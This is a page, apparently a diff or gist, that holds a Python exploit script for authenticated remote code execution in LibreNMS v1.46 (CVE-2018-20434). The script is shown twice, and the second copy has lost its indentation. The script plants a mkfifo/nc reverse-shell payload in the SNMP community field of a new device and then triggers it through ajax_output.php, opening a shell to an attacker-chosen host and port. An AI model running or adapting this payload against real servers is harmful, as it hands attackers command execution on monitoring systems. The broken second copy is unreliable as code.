mhaskar · February 19, 2022 13:10 · lifesfun101 · Aug 20, 2019
diff --git a/librenms-exploit.py b/librenms-exploit.py
 #!/usr/bin/python

 '''
 # Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
 # Date: 24/12/2018
 # Exploit Author: Askar (@mohammadaskar2)
 # CVE : CVE-2018-20434
 # Vendor Homepage: https://www.librenms.org/
 # Version: v1.46
 # Tested on: Ubuntu 18.04 / PHP 7.2.10
 '''

 import requests
 from urllib import urlencode
 import sys

 if len(sys.argv) != 5:
    print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
    sys.exit(0)

 # target (user input)
 target = sys.argv[1]

 # cookies (user input)
 raw_cookies = sys.argv[2]

 # remote host to connect to
 rhost = sys.argv[3]

 # remote port to connect to
 rport = sys.argv[4]

 # hostname to use (change it if you want)
 hostname = "dummydevice"

 # payload to create reverse shell
 payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)

 # request headers
 headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
    }

 # request cookies
 cookies = {}
 for cookie in raw_cookies.split(";"):
    # print cookie
    c = cookie.split("=")
    cookies[c[0]] = c[1]


 def create_new_device(url):
    raw_request = {
        "hostname": hostname,
        "snmp": "on",
        "sysName": "",
        "hardware": "",
        "os": "",
        "snmpver": "v2c",
        "os_id": "",
        "port": "",
        "transport": "udp",
        "port_assoc_mode": "ifIndex",
        "community": payload,
        "authlevel": "noAuthNoPriv",
        "authname": "",
        "authpass": "",
        "cryptopass": "",
        "authalgo": "MD5",
        "cryptoalgo": "AES",
        "force_add": "on",
        "Submit": ""
    }
    full_url = url + "/addhost/"
    request_body = urlencode(raw_request)

    # send the device creation request
    request = requests.post(
        full_url, data=request_body, cookies=cookies, headers=headers
    )
    text = request.text
    if "Device added" in text:
        print "[+] Device Created Sucssfully"
        return True
    else:
        print "[-] Cannot Create Device"
        return False


 def request_exploit(url):
    params = {
        "id": "capture",
        "format": "text",
        "type": "snmpwalk",
        "hostname": hostname
        }

    # send the payload call
    request = requests.get(url + "/ajax_output.php",
        params=params,
        headers=headers,
        cookies=cookies
        )
    text = request.text
    if rhost in text:
        print "[+] Done, check your nc !"


 if create_new_device(target):
    request_exploit(target)
	#!/usr/bin/python

	'''
	# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
	# Date: 24/12/2018
	# Exploit Author: Askar (@mohammadaskar2)
	# CVE : CVE-2018-20434
	# Vendor Homepage: https://www.librenms.org/
	# Version: v1.46
	# Tested on: Ubuntu 18.04 / PHP 7.2.10
	'''

	import requests
	from urllib import urlencode
	import sys

	if len(sys.argv) != 5:
	print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
	sys.exit(0)

	# target (user input)
	target = sys.argv[1]

	# cookies (user input)
	raw_cookies = sys.argv[2]

	# remote host to connect to
	rhost = sys.argv[3]

	# remote port to connect to
	rport = sys.argv[4]

	# hostname to use (change it if you want)
	hostname = "dummydevice"

	# payload to create reverse shell
	payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc {0} {1} >/tmp/f) #".format(rhost, rport)

	# request headers
	headers = {
	"Content-Type": "application/x-www-form-urlencoded",
	"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
	}

	# request cookies
	cookies = {}
	for cookie in raw_cookies.split(";"):
	# print cookie
	c = cookie.split("=")
	cookies[c[0]] = c[1]


	def create_new_device(url):
	raw_request = {
	"hostname": hostname,
	"snmp": "on",
	"sysName": "",
	"hardware": "",
	"os": "",
	"snmpver": "v2c",
	"os_id": "",
	"port": "",
	"transport": "udp",
	"port_assoc_mode": "ifIndex",
	"community": payload,
	"authlevel": "noAuthNoPriv",
	"authname": "",
	"authpass": "",
	"cryptopass": "",
	"authalgo": "MD5",
	"cryptoalgo": "AES",
	"force_add": "on",
	"Submit": ""
	}
	full_url = url + "/addhost/"
	request_body = urlencode(raw_request)

	# send the device creation request
	request = requests.post(
	full_url, data=request_body, cookies=cookies, headers=headers
	)
	text = request.text
	if "Device added" in text:
	print "[+] Device Created Sucssfully"
	return True
	else:
	print "[-] Cannot Create Device"
	return False


	def request_exploit(url):
	params = {
	"id": "capture",
	"format": "text",
	"type": "snmpwalk",
	"hostname": hostname
	}

	# send the payload call
	request = requests.get(url + "/ajax_output.php",
	params=params,
	headers=headers,
	cookies=cookies
	)
	text = request.text
	if rhost in text:
	print "[+] Done, check your nc !"


	if create_new_device(target):
	request_exploit(target)